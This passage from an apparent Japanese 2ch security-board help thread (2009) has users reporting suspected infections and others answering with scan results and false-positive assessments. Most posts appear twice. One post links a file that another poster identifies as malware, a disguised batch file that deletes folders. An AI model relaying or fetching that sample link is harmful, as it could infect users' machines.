Safariの動作が異常なまでに重い。同じ量のウィンドウとタブを開いても
Firefoxの方が遙かに軽いのだ。Mac ProのXeon x2 8-Coreなのでどう考えてもおかしい。
私が気に掛かっているのは捕まった時、
悪あがきでそいつが「そんなの0を書き込んでインストールすればいい」といっていた事。
フォーマットの際0をn回書き込む消去オプションを選択しなかったのだが、
これが原因でまだウィルスが残っているのではないだろうか?
考えられるタイプはアプリのプライオリティを下げる物ではないかと思う。
どう思う?
286 :名無しさん@お腹いっぱい。:2009/11/30(月) 17:41:22
ウィルスバスターの動画?に出てくる変なハゲオヤジが気持ち悪い。
動画変えて欲しい。
動画変えて欲しい。
287 :名無しさん@お腹いっぱい。:2009/12/01(火) 07:31:32
急にPCが重くなって、実はウィルスに感染してたという話はよく聞くけど、
逆に急に滅茶苦茶軽くなって、実は(ry ってことってあるのかな?
確かに最近対策ソフトを変えたんだけど、その直後からじゃなくて1週間後くらいだから
そのせいとは思えないんだけど。(バスター→avast!)
逆に急に滅茶苦茶軽くなって、実は(ry ってことってあるのかな?
確かに最近対策ソフトを変えたんだけど、その直後からじゃなくて1週間後くらいだから
そのせいとは思えないんだけど。(バスター→avast!)
質問失礼します
PC素人なので不明な点が多いですが教えて頂ければ幸いです
【OS】 WindowsXP
【ソフト】 マッカーフィー(綴り解らず申し訳有りません)
【バージョン】 最新
【スパイウェア】 不明
【ルータ】 有り(PS3と繋いでいます)
【スキャン結果】 問題無し
ポートの解放はしておらず、掲示板のURLをクリックした所、microsoft outlookのメール画面が大量に開かれ直ぐに電源をOFFしました、再起動後は特に問題は有りませんでした。
開かれたのがmicrosoft outlookと言うこともあり不安です。
大丈夫なのでしょうか…
PC素人なので不明な点が多いですが教えて頂ければ幸いです
【OS】 WindowsXP
【ソフト】 マッカーフィー(綴り解らず申し訳有りません)
【バージョン】 最新
【スパイウェア】 不明
【ルータ】 有り(PS3と繋いでいます)
【スキャン結果】 問題無し
ポートの解放はしておらず、掲示板のURLをクリックした所、microsoft outlookのメール画面が大量に開かれ直ぐに電源をOFFしました、再起動後は特に問題は有りませんでした。
開かれたのがmicrosoft outlookと言うこともあり不安です。
大丈夫なのでしょうか…
289 :名無しさん@お腹いっぱい。:2009/12/01(火) 15:35:37
>>288
http://ja.wikipedia.org/wiki/%E3%83%96%E3%83%A9%E3%82%A6%E3%82%B6%E3%82%AF%E3%83%A9%E3%83%83%E3%82%B7%E3%83%A3%E3%83%BC
ま、ただのイタズラだろ。PCに実害は無いと思うけどね。
念の為ウィルススキャンでもして、二度とそのようなサイトには行かない事だ。
http://ja.wikipedia.org/wiki/%E3%83%96%E3%83%A9%E3%82%A6%E3%82%B6%E3%82%AF%E3%83%A9%E3%83%83%E3%82%B7%E3%83%A3%E3%83%BC
ま、ただのイタズラだろ。PCに実害は無いと思うけどね。
念の為ウィルススキャンでもして、二度とそのようなサイトには行かない事だ。
290 :名無しさん@お腹いっぱい。:2009/12/01(火) 16:03:10
>>289
なるほど、ブラクラと言うんですね
今まで広告が沢山出るのはあったんですがソフトまで出来るとは…
勉強になりました、一応もう一度スキャンかけておきます。
ありがとうございました。m(_ _)m
なるほど、ブラクラと言うんですね
今まで広告が沢山出るのはあったんですがソフトまで出来るとは…
勉強になりました、一応もう一度スキャンかけておきます。
ありがとうございました。m(_ _)m
291 :名無しさん@お腹いっぱい。:2009/12/03(木) 16:52:26
失礼します。
先ほど、ウィルスバスター2010でコンピュータ全体を検索してみると
TROJ_Gen cx02c7というものが3つ検索されました。
とりあえず、隔離してその後に駆除しようとしたんですが
できませんでした。
これはもう削除してもよろしんでしょうか?
回答よろしくお願いします。
先ほど、ウィルスバスター2010でコンピュータ全体を検索してみると
TROJ_Gen cx02c7というものが3つ検索されました。
とりあえず、隔離してその後に駆除しようとしたんですが
できませんでした。
これはもう削除してもよろしんでしょうか?
回答よろしくお願いします。
292 :名無しさん@お腹いっぱい。:2009/12/03(木) 22:23:05
>>291
意味が二通り考えられて、
@隔離した後に駆除を行おうとしたがどちらも失敗した
A隔離はできたけど駆除は出来なかった
どちらにしても見つかった場所や元のファイルによっては起動不可の可能性や
誤検出の可能性もあるんで。
見つかった場所なり書いた方が回答あると思いますよ。
※テンプレ使いましょう。
意味が二通り考えられて、
@隔離した後に駆除を行おうとしたがどちらも失敗した
A隔離はできたけど駆除は出来なかった
どちらにしても見つかった場所や元のファイルによっては起動不可の可能性や
誤検出の可能性もあるんで。
見つかった場所なり書いた方が回答あると思いますよ。
※テンプレ使いましょう。
293 :名無しさん@お腹いっぱい。:2009/12/03(木) 23:02:27
>>292
すいません。書き直します。
TROJ_Gen cx02c7というウィルスが3つ検出されて、隔離はできたんですが
駆除ができませんでした。
場所はそれぞれ、
C:\Program Files\kgxfyu\
C:\System Volume information\_restore{.......}
.....の所はアルファベットや大文字がずっと続いてます。
C:\Documents and Settings\Owner\Application Data\Sun\Java\Deployment\cache\6.0
の三ヶ所から検出されました。
よろしくお願いします。
すいません。書き直します。
TROJ_Gen cx02c7というウィルスが3つ検出されて、隔離はできたんですが
駆除ができませんでした。
場所はそれぞれ、
C:\Program Files\kgxfyu\
C:\System Volume information\_restore{.......}
.....の所はアルファベットや大文字がずっと続いてます。
C:\Documents and Settings\Owner\Application Data\Sun\Java\Deployment\cache\6.0
の三ヶ所から検出されました。
よろしくお願いします。
294 :名無しさん@お腹いっぱい。:2009/12/03(木) 23:16:10
>>293
一番上のプログラムファイルのフォルダに心当たりはありますか?
最近新しいプログラムをインストールしたとか。
3番目のは誤検出っぽいですね。。
一度、バスター以外のオンラインスキャンを使って同じ用に検出されるか試して貰えますか?
一番上のプログラムファイルのフォルダに心当たりはありますか?
最近新しいプログラムをインストールしたとか。
3番目のは誤検出っぽいですね。。
一度、バスター以外のオンラインスキャンを使って同じ用に検出されるか試して貰えますか?
295 :名無しさん@お腹いっぱい。:2009/12/04(金) 18:52:03
こんな事あり得るんですか?マウントしてウイルス検索をかけたら、ウイルス0でしたがインストールが終わったらウイルスが見つかりましたとでます。
正直に言いますがnyです。あり得るんでしょうか?
正直に言いますがnyです。あり得るんでしょうか?
296 :名無しさん@お腹いっぱい。:2009/12/04(金) 19:48:18
ここは、LANや個人のPCへの侵入、トロイ、ウィルス、スパイウェアなど、
様々なネット上の危険や、その対策方法を語りあうための板です。
パソコン初心者の方は、【 PC初心者板 】で、
ネット上の架空請求などは【 防犯・詐欺対策板 】で質問した方が良い場合があります。
ネット犯罪の被害に遭われた方は、まず警察に相談しましょう。 ▽ 板違いと禁止の投稿
セキュリティ関係以外のソフトの話題は板違い。→ 【 Software板 】へ
Winny関連の話題は板違い。→ 【 Download板 】へ
不正アクセスの方法、パスワード・暗号解析など、攻撃方法の話題は禁止です。
荒らし依頼は全ての板で禁止です。
禁止内容の書き込みを発見したら【 削除依頼 】をお願いします。 ▽ 同内容・類似内容スレは立てない
新たにスレを立てる前に必ず「スレッド一覧」を開き、同じようなスレがないかを
検索し確認して下さい。[ 検索方法 Win:Ctrl+F Mac:Command+F ]
もし同内容・類似内容のスレがある場合は、本スレに誘導の上、削除依頼をして下さい。 ▽ 単発質問スレは立てない ▽ 複数のスレに同じ質問(マルチポスト)をしない
質問の際には「スレッド一覧」を「質問」「総合」またはキーワードで検索し、
内容がふさわしいと思われるスレへどうぞ。
他スレで誘導された時には、どのスレから誘導されたのかを必ず書きましょう。
◎ セキュリティ板の自治スレは【 削除議論板 】にあります。ご確認下さい。
様々なネット上の危険や、その対策方法を語りあうための板です。
パソコン初心者の方は、【 PC初心者板 】で、
ネット上の架空請求などは【 防犯・詐欺対策板 】で質問した方が良い場合があります。
ネット犯罪の被害に遭われた方は、まず警察に相談しましょう。 ▽ 板違いと禁止の投稿
セキュリティ関係以外のソフトの話題は板違い。→ 【 Software板 】へ
Winny関連の話題は板違い。→ 【 Download板 】へ
不正アクセスの方法、パスワード・暗号解析など、攻撃方法の話題は禁止です。
荒らし依頼は全ての板で禁止です。
禁止内容の書き込みを発見したら【 削除依頼 】をお願いします。 ▽ 同内容・類似内容スレは立てない
新たにスレを立てる前に必ず「スレッド一覧」を開き、同じようなスレがないかを
検索し確認して下さい。[ 検索方法 Win:Ctrl+F Mac:Command+F ]
もし同内容・類似内容のスレがある場合は、本スレに誘導の上、削除依頼をして下さい。 ▽ 単発質問スレは立てない ▽ 複数のスレに同じ質問(マルチポスト)をしない
質問の際には「スレッド一覧」を「質問」「総合」またはキーワードで検索し、
内容がふさわしいと思われるスレへどうぞ。
他スレで誘導された時には、どのスレから誘導されたのかを必ず書きましょう。
◎ セキュリティ板の自治スレは【 削除議論板 】にあります。ご確認下さい。
297 :名無しさん@お腹いっぱい。:2009/12/04(金) 20:30:51
| 丶 _ .,! ヽ
> ``‐.`ヽ、 .|、 |
゙'. ,ト `i、 `i、 .、″
| .,.:/"" ゙‐,. ` /
` .,-''ヽ"` ヽ,,,、 !
、,、‐'゙l‐、 .丿 : ':、
、/ヽヽ‐ヽ、;,,,,,,,,,-.ッ:''` .,"-、
,r"ツぃ丶 `````` ../ `i、
,.イ:、ヽ/ー`-、-ヽヽヽ、−´ .l゙`-、
_,,l゙-:ヽ,;、、 、、丶 ゙i、,,、
,<_ l_ヽ冫`'`-、;,,,、、、、.............,,,,、.-`": │ `i、
、、::|、、、ヽ,、、. ```: : : ``` 、.、'
.l","ヽ、,"、,"'、ぃ、、,、、、、.、、、.、、、_、.,,.ヽ´ l゙ ゙).._
,、':゙l:、、`:ヽ、`:、 : `"```¬――'''"`゙^` : ..、丶 .l゙ `ヽ
,i´.、ヽ".、".、"'ヽヽ;,:、........、 、、...,,,、−‘` 、‐ |゙゙:‐,
,.-l,i´.、".`ヽ,,,.".` `゙゙'"`'-ー"``"``r-ー`'": _.‐′ 丿 ,!
j".、'ヽ,".、".、"`''`ー、._、、、 、._,、..-‐:'''′ .、,:" 丿
゙l,"`"`''ヽヽ"`"` ```゙'''"ヽ∠、、、、ぃ-`''''": ` 、._./` ._/`
`'i`ヽヽヽ`''ーi、、、: : 、.,-‐'` 、/`
``ヽン'`"` : `~``―ヽ::,,,,,,,,,,.....................,,,,.ー'``^ ,、‐'"`
`"'゙―-、,,,,..、、 : ..,、ー'"'
> ``‐.`ヽ、 .|、 |
゙'. ,ト `i、 `i、 .、″
| .,.:/"" ゙‐,. ` /
` .,-''ヽ"` ヽ,,,、 !
、,、‐'゙l‐、 .丿 : ':、
、/ヽヽ‐ヽ、;,,,,,,,,,-.ッ:''` .,"-、
,r"ツぃ丶 `````` ../ `i、
,.イ:、ヽ/ー`-、-ヽヽヽ、−´ .l゙`-、
_,,l゙-:ヽ,;、、 、、丶 ゙i、,,、
,<_ l_ヽ冫`'`-、;,,,、、、、.............,,,,、.-`": │ `i、
、、::|、、、ヽ,、、. ```: : : ``` 、.、'
.l","ヽ、,"、,"'、ぃ、、,、、、、.、、、.、、、_、.,,.ヽ´ l゙ ゙).._
,、':゙l:、、`:ヽ、`:、 : `"```¬――'''"`゙^` : ..、丶 .l゙ `ヽ
,i´.、ヽ".、".、"'ヽヽ;,:、........、 、、...,,,、−‘` 、‐ |゙゙:‐,
,.-l,i´.、".`ヽ,,,.".` `゙゙'"`'-ー"``"``r-ー`'": _.‐′ 丿 ,!
j".、'ヽ,".、".、"`''`ー、._、、、 、._,、..-‐:'''′ .、,:" 丿
゙l,"`"`''ヽヽ"`"` ```゙'''"ヽ∠、、、、ぃ-`''''": ` 、._./` ._/`
`'i`ヽヽヽ`''ーi、、、: : 、.,-‐'` 、/`
``ヽン'`"` : `~``―ヽ::,,,,,,,,,,.....................,,,,.ー'``^ ,、‐'"`
`"'゙―-、,,,,..、、 : ..,、ー'"'
298 :名無しさん@お腹いっぱい。:2009/12/08(火) 02:01:59
【使用OS】XP
【Microsoft Updateの更新の状態】最新
【セキュリティソフトと年式】ウイルスバスター16最新
【回線の種類・ルータの有無】ADSL
【具体的な症状】
謎のプログラムav_md.exeがかなり頻繁に他ファイルにアクセス(改竄?)しようとする。
【過程と措置】
ウイルスバスターでav_md.exeが他ファイルに何かしようとしたらブロックするように設定。
av_md.exeをデリートしようとしたが、できない。
ウイルスバスターでスキャンしても無反応。
STOPZilla(無料トライアル、最新版)でスキャンしてもスルー。
検索しても日本語のサイトは見つからず、海外サイトのみ。
英語がかなり不得意なのであまり情報がつかめない。
新種の悪質なスパイウェア?とか書いてある?
どうか、アドバイスお願いします。
【Microsoft Updateの更新の状態】最新
【セキュリティソフトと年式】ウイルスバスター16最新
【回線の種類・ルータの有無】ADSL
【具体的な症状】
謎のプログラムav_md.exeがかなり頻繁に他ファイルにアクセス(改竄?)しようとする。
【過程と措置】
ウイルスバスターでav_md.exeが他ファイルに何かしようとしたらブロックするように設定。
av_md.exeをデリートしようとしたが、できない。
ウイルスバスターでスキャンしても無反応。
STOPZilla(無料トライアル、最新版)でスキャンしてもスルー。
検索しても日本語のサイトは見つからず、海外サイトのみ。
英語がかなり不得意なのであまり情報がつかめない。
新種の悪質なスパイウェア?とか書いてある?
どうか、アドバイスお願いします。
299 :名無しさん@お腹いっぱい。:2009/12/08(火) 02:16:13
300 :名無しさん@お腹いっぱい。:2009/12/08(火) 08:51:43
ああ、懇切丁寧に書いてあるじゃないか
http://comprolive.com/remove/harmful/exe/av-md-exe
http://comprolive.com/remove/harmful/exe/av-md-exe
301 :名無しさん@お腹いっぱい。:2009/12/08(火) 20:49:56
302 :名無しさん@お腹いっぱい。:2009/12/09(水) 17:41:59
【使用OS】 「Vista」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「ウィルスバスター」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「行っている」
【ルータの有無】 「無」
http://uproda.2ch-library.com/1952800XT/lib195280.jpg
こんなのが定期的に出てくるんですがどうしたらいいですか・・・
検索かけて出たもの全て削除したのですが消えません
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「ウィルスバスター」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「行っている」
【ルータの有無】 「無」
http://uproda.2ch-library.com/1952800XT/lib195280.jpg
こんなのが定期的に出てくるんですがどうしたらいいですか・・・
検索かけて出たもの全て削除したのですが消えません
303 :名無しさん@お腹いっぱい。:2009/12/10(木) 20:19:22
304 :名無しさん@お腹いっぱい。:2009/12/11(金) 07:45:58
質問場所違ってたらすみません
【使用OS】 「Windows XP SP3」
【Microsoft Update(MU)の状態】 「最新(自動更新)」
【使用セキュリティソフトとバージョン】 「カスペルスキー(バージョン忘れました。去年購入)」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「同上」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「なし」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
PCを起動した直後に「複数の回線に接続されています。○秒後に遮断します」のメッセージ
→「データベースが破損しています。更新して下さい(この時点で
セキュリティ対策ソフトが動いてないとWindowsがエラーを出す)」
→手動で更新したら一時的に動き出すが、再起動するとまたループ
昨日まで何事もなく動いていたのでシステム復元してみたけど同じでした
簡易検索では何も見つかりませんでしたが、完全検索を
実行しようとすると(暫く放置すると)↑の症状で止まってしまいます。
これもウイルスの一種なのでしょうか?
【使用OS】 「Windows XP SP3」
【Microsoft Update(MU)の状態】 「最新(自動更新)」
【使用セキュリティソフトとバージョン】 「カスペルスキー(バージョン忘れました。去年購入)」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「同上」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「なし」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
PCを起動した直後に「複数の回線に接続されています。○秒後に遮断します」のメッセージ
→「データベースが破損しています。更新して下さい(この時点で
セキュリティ対策ソフトが動いてないとWindowsがエラーを出す)」
→手動で更新したら一時的に動き出すが、再起動するとまたループ
昨日まで何事もなく動いていたのでシステム復元してみたけど同じでした
簡易検索では何も見つかりませんでしたが、完全検索を
実行しようとすると(暫く放置すると)↑の症状で止まってしまいます。
これもウイルスの一種なのでしょうか?
305 :名無しさん@お腹いっぱい。:2009/12/11(金) 10:40:04
>>304
心配するな。2009でなるらしい。俺もなっている。
リブートすると直るという報告もあるが、おれはだめだった。
先ほど更新処理のロールバックしたら直ったようにみえたが、
数分たったらまた無効になった。
いまから本家に不具合の報告してくる。
あなたも不具合の報告したら?
心配するな。2009でなるらしい。俺もなっている。
リブートすると直るという報告もあるが、おれはだめだった。
先ほど更新処理のロールバックしたら直ったようにみえたが、
数分たったらまた無効になった。
いまから本家に不具合の報告してくる。
あなたも不具合の報告したら?
306 :名無しさん@お腹いっぱい。:2009/12/11(金) 11:47:47
307 :名無しさん@お腹いっぱい。:2009/12/12(土) 01:03:49
>>303
ありがとうございます!
ありがとうございます!
308 :名無しさん@お腹いっぱい。:2009/12/13(日) 07:18:31
マルウエアが入るとYoutubeの動画をすぐ見れなくなりますね。
309 :名無しさん@お腹いっぱい。:2009/12/16(水) 02:24:32
テンプレとマッチしないためテンプレスルーごめんなさい。
スレ違いでもすいません。
最近2chによく貼られてるこれ。
jpgがexeに偽装されてるんだけど、
ウィルスとして引っかからない。
誰かが新たに作ったのか。なんでしょこれ
http://depositfiles.com/files/qs6vezs54
スレ違いでもすいません。
最近2chによく貼られてるこれ。
jpgがexeに偽装されてるんだけど、
ウィルスとして引っかからない。
誰かが新たに作ったのか。なんでしょこれ
http://depositfiles.com/files/qs6vezs54
310 :名無しさん@お腹いっぱい。:2009/12/17(木) 01:07:25
EPSONのPX640の最新ドライバからウィルスが検出されたのですが・・・
WinVista
avast!4.8.1368
定義パターン最新
http://www.epson.jp/dl_soft/readme/7483.htm
「ここから使用許諾に同意してダウンロード」を押し
pxa640f654.EXEをダウンロードすると検出されます。
WinVista
avast!4.8.1368
定義パターン最新
http://www.epson.jp/dl_soft/readme/7483.htm
「ここから使用許諾に同意してダウンロード」を押し
pxa640f654.EXEをダウンロードすると検出されます。
311 :名無しさん@お腹いっぱい。:2009/12/17(木) 01:33:04
>>310
ただ報告したいだけか?
検出結果の真偽がしりたいのか?
ttp://www.virustotal.com/jp/analisis/ace6d50a9cf63c801d51d96bbc026ca94b91ac7b7fe068f8335e2231cb10a982-1260980413
GDataとAvastだけがマルウエアの疑いがあると申しておる。
エプソンのドライバだし誤検出とみた。
ただ報告したいだけか?
検出結果の真偽がしりたいのか?
ttp://www.virustotal.com/jp/analisis/ace6d50a9cf63c801d51d96bbc026ca94b91ac7b7fe068f8335e2231cb10a982-1260980413
GDataとAvastだけがマルウエアの疑いがあると申しておる。
エプソンのドライバだし誤検出とみた。
312 :名無しさん@お腹いっぱい。:2009/12/17(木) 02:16:03
【使用OS】 「XP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「VB2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新です」
【スパイウェア対策ソフト】 「VB」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「行っています」
【ルータの有無】 「ノートパソコン内蔵のでつないでます」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「cryp-krapというのが検出されましたが、削除や駆除できません。ぐぐってみたのですが、うまい対策がみつかりませんでした。どうしたらいいですか?よろしくお願いします。」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「VB2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新です」
【スパイウェア対策ソフト】 「VB」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「行っています」
【ルータの有無】 「ノートパソコン内蔵のでつないでます」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「cryp-krapというのが検出されましたが、削除や駆除できません。ぐぐってみたのですが、うまい対策がみつかりませんでした。どうしたらいいですか?よろしくお願いします。」
313 :名無しさん@お腹いっぱい。:2009/12/18(金) 22:47:21
>>309
やっと全鯖規制解除された...orz
ウイルスですね。ちなみに、VTの結果はこれ ↓
http://www.virustotal.com/jp/analisis/2772cca77568cdf6e1ef0325613ee251dd0bcbeb446b08a25e4c7d0955b5b888-1261143781 (7/41)
確かに検出率悪いね。フリーで日本で使われてるのだと、検出できるのAVIRAとPandaだけだし。
やっと全鯖規制解除された...orz
ウイルスですね。ちなみに、VTの結果はこれ ↓
http://www.virustotal.com/jp/analisis/2772cca77568cdf6e1ef0325613ee251dd0bcbeb446b08a25e4c7d0955b5b888-1261143781 (7/41)
確かに検出率悪いね。フリーで日本で使われてるのだと、検出できるのAVIRAとPandaだけだし。
314 :名無しさん@お腹いっぱい。:2009/12/18(金) 23:48:43
ウイルスってか、自己解凍書庫にバッチファイルが入ってるだけだし。
しかも、forでtokensの上限値を超えてるせいで無限ループ状態になって正常に機能しないし。
しかも、forでtokensの上限値を超えてるせいで無限ループ状態になって正常に機能しないし。
>>314
BATファイルの中に日本語入ってたし、状況からすると日本のローカルなマルウェアですかね。
とりあえず、フリーで使えるベンダーで、未検出の所に検体を送ってみた。
送ったのは、Avast,AVG,BitDefender,Microsoftの4つ。
Bitが黒判定すると、Bitエンジン使ってる他のベンダーも検出するようになるはずなので、
少し様子見してみますか。
BATファイルの中に日本語入ってたし、状況からすると日本のローカルなマルウェアですかね。
とりあえず、フリーで使えるベンダーで、未検出の所に検体を送ってみた。
送ったのは、Avast,AVG,BitDefender,Microsoftの4つ。
Bitが黒判定すると、Bitエンジン使ってる他のベンダーも検出するようになるはずなので、
少し様子見してみますか。
316 :名無しさん@お腹いっぱい。:2009/12/21(月) 03:18:59
c:\windows\system32内にwinmow.exeってファイルがあったんだけど勝手にどこかと通信しようとしてて
間違いなくウィルスの類だよね?ググっても全然情報がないからどう対処していいかわからない
http://www.virustotal.com/jp/analisis/b3ff3c391b23afc78bcffbad62c6da81df5746f0e8436bca7b9c6d35e5883fc5-1261322773
http://info.prevx.com/aboutprogramtext.asp?PX5=3259908F0091A8F11AF001265582FB005D39EE85
間違いなくウィルスの類だよね?ググっても全然情報がないからどう対処していいかわからない
http://www.virustotal.com/jp/analisis/b3ff3c391b23afc78bcffbad62c6da81df5746f0e8436bca7b9c6d35e5883fc5-1261322773
http://info.prevx.com/aboutprogramtext.asp?PX5=3259908F0091A8F11AF001265582FB005D39EE85
317 :名無しさん@お腹いっぱい。:2009/12/21(月) 05:04:37
318 :名無しさん@お腹いっぱい。:2009/12/21(月) 10:42:46
>>316
勝手に通信するなんてのは別に珍しくないだろ。それだけでウィルスと判断するのは早計に過ぎる。
トレンドマイクロ辺りがグレーと判断している所から、ここじゃ何とも言いようが無いんじゃないか?
PAK_Generic.001を飼いだした経緯も解らんし。
勝手に通信するなんてのは別に珍しくないだろ。それだけでウィルスと判断するのは早計に過ぎる。
トレンドマイクロ辺りがグレーと判断している所から、ここじゃ何とも言いようが無いんじゃないか?
PAK_Generic.001を飼いだした経緯も解らんし。
>>315
ttp://www.virustotal.com/analisis/2772cca77568cdf6e1ef0325613ee251dd0bcbeb446b08a25e4c7d0955b5b888-1261405282 (9/40)
BitDefenderが黒判定したので、Bitエンジン採用のF-SecとG DATAも黒判定になりました。(※ 上記、VT不調でPrevxの結果がない。本来、10/41)
多分、明日にはAVGとavastも黒になるんじゃないかと思います。 んで、MSEは最近対応が凄く遅いから、しばらく放置されるかも。
>>317
中身を見た感じじゃ、どうも、特定のキーワードを含むフォルダを全部バッサリと消すバッチファイルみたいだけど...
ttp://www.virustotal.com/analisis/2772cca77568cdf6e1ef0325613ee251dd0bcbeb446b08a25e4c7d0955b5b888-1261405282 (9/40)
BitDefenderが黒判定したので、Bitエンジン採用のF-SecとG DATAも黒判定になりました。(※ 上記、VT不調でPrevxの結果がない。本来、10/41)
多分、明日にはAVGとavastも黒になるんじゃないかと思います。 んで、MSEは最近対応が凄く遅いから、しばらく放置されるかも。
>>317
中身を見た感じじゃ、どうも、特定のキーワードを含むフォルダを全部バッサリと消すバッチファイルみたいだけど...
320 :名無しさん@お腹いっぱい。:2009/12/22(火) 21:03:08
PCから書き込めず、携帯から失礼します。
スレチでしたら誘導をお願いします。
ダウンローダーを使ってWinrar書庫(part1〜4)を落としたんですが
PCのフォルダの“ファイルの種類”が「HTML ドキュメント」になっていて結合解凍出来ませんでした。
該当スレと思われるスレで再生方法を聞いた所、「クリーンインストールしろ」「終わったな」等のレスが付いたので心配です。
偽装ファイルというウィルスなのでしょうか?
参考になるか解りませんが、一応テンプレは
【使用OS】Vista
【Microsoft Update(MU)の状態】最新
【使用セキュリティソフトとバージョン】Nortonお試し版
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】最新
【スパイウェア対策ソフト】Nortonお試し版
【スパイウェア対策ソフトの更新は定期的に行なっているか】最新
【ルータの有無】無し
です。よろしくお願いします。
スレチでしたら誘導をお願いします。
ダウンローダーを使ってWinrar書庫(part1〜4)を落としたんですが
PCのフォルダの“ファイルの種類”が「HTML ドキュメント」になっていて結合解凍出来ませんでした。
該当スレと思われるスレで再生方法を聞いた所、「クリーンインストールしろ」「終わったな」等のレスが付いたので心配です。
偽装ファイルというウィルスなのでしょうか?
参考になるか解りませんが、一応テンプレは
【使用OS】Vista
【Microsoft Update(MU)の状態】最新
【使用セキュリティソフトとバージョン】Nortonお試し版
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】最新
【スパイウェア対策ソフト】Nortonお試し版
【スパイウェア対策ソフトの更新は定期的に行なっているか】最新
【ルータの有無】無し
です。よろしくお願いします。
321 :名無しさん@お腹いっぱい。:2009/12/22(火) 21:05:47
連投すいません
Nortonでのスキャンは無反応でした
ファイルのサイズは一つ200Mbくらいです。
よろしくお願いします。
Nortonでのスキャンは無反応でした
ファイルのサイズは一つ200Mbくらいです。
よろしくお願いします。
322 :名無しさん@お腹いっぱい。:2009/12/22(火) 23:15:41
最近、無線LAN入れたのですが、wirelesskey viewというのでキーが丸見えなのですが、どうしてですか?
一応自分はWPA2-パーソナル(AES)で暗号かけてあるのですが。
一応自分はWPA2-パーソナル(AES)で暗号かけてあるのですが。
323 :名無しさん@お腹いっぱい。:2009/12/22(火) 23:16:29
すいません間違えました
>>319
ttp://www.virustotal.com/jp/analisis/2772cca77568cdf6e1ef0325613ee251dd0bcbeb446b08a25e4c7d0955b5b888-1261532691 (11/41)
AVGが対応したので11/41。 あとはavast待ちかな...MSEはいつも通り2週間は放置だろうし。
つか、もしかしてノートンとかマカフィーとかは、誰も検体送ってないのか?これ
>>320
情報少なすぎて何とも。 ただ、普通は落としたファイルを実行もしくは開かないと、感染はしない。
(変なスクリプト入りのhtmlで感染するのは、サイトにアクセスした時にブラウザでhtmlを開くから)
ファイルをダブルクリックしたりしてなければ、普通はまあ大丈夫。 逆に、ミスでも何でもファイルを開いてれば、ちょっとヤバイ。
あと、どのベンダーもそうだけど、セキュリティソフトは過信しない方が良いと思う。検出しなければOKとは言い難い。
>313のマルウェア、なんとなくその後の経過を書いてるけど、マイナーなヤツは、見ての通り誰もベンダーに検体を送らないと、全然対応されない。
それに、P2Pはタコイカとかいう変なのが流行しているらしいので、結合したらそれだったというオチもあり得るし。
ttp://www.virustotal.com/jp/analisis/2772cca77568cdf6e1ef0325613ee251dd0bcbeb446b08a25e4c7d0955b5b888-1261532691 (11/41)
AVGが対応したので11/41。 あとはavast待ちかな...MSEはいつも通り2週間は放置だろうし。
つか、もしかしてノートンとかマカフィーとかは、誰も検体送ってないのか?これ
>>320
情報少なすぎて何とも。 ただ、普通は落としたファイルを実行もしくは開かないと、感染はしない。
(変なスクリプト入りのhtmlで感染するのは、サイトにアクセスした時にブラウザでhtmlを開くから)
ファイルをダブルクリックしたりしてなければ、普通はまあ大丈夫。 逆に、ミスでも何でもファイルを開いてれば、ちょっとヤバイ。
あと、どのベンダーもそうだけど、セキュリティソフトは過信しない方が良いと思う。検出しなければOKとは言い難い。
>313のマルウェア、なんとなくその後の経過を書いてるけど、マイナーなヤツは、見ての通り誰もベンダーに検体を送らないと、全然対応されない。
それに、P2Pはタコイカとかいう変なのが流行しているらしいので、結合したらそれだったというオチもあり得るし。
>>324
>>320です。レスありがとうございます。
落とした場所が判明し、そのサイトで他にも多数ファイルを落としていた為
信用できると判断し、拡張子を変え結合したら無事お目当てのファイルでした。
実は分割ファイルの一つをスキャンした後クリックしてしまい(ブラウザが開き文字化けした文字列がずらっと並び
IEからの応答がありません的な窓が出て来て閉じました)、非常に不安でしたが
今回はセーフだった様です。
今後はセキュリティソフトを過信せず、怪しいファイルは開かぬ様に一層気をつけます。
>>320です。レスありがとうございます。
落とした場所が判明し、そのサイトで他にも多数ファイルを落としていた為
信用できると判断し、拡張子を変え結合したら無事お目当てのファイルでした。
実は分割ファイルの一つをスキャンした後クリックしてしまい(ブラウザが開き文字化けした文字列がずらっと並び
IEからの応答がありません的な窓が出て来て閉じました)、非常に不安でしたが
今回はセーフだった様です。
今後はセキュリティソフトを過信せず、怪しいファイルは開かぬ様に一層気をつけます。
326 :名無しさん@お腹いっぱい。:2009/12/26(土) 20:49:38
AVGを使っていてwin32/Zpermに感染しているとでたんですが
これはどういったウィルスでしょうか?
これはどういったウィルスでしょうか?
327 :名無しさん@お腹いっぱい。:2009/12/26(土) 21:31:15
328 :名無しさん@お腹いっぱい。:2009/12/26(土) 22:49:01
Panda最強だな
329 :名無しさん@お腹いっぱい。:2009/12/27(日) 05:57:05
HP見回ってたら固まって動かなくなったので
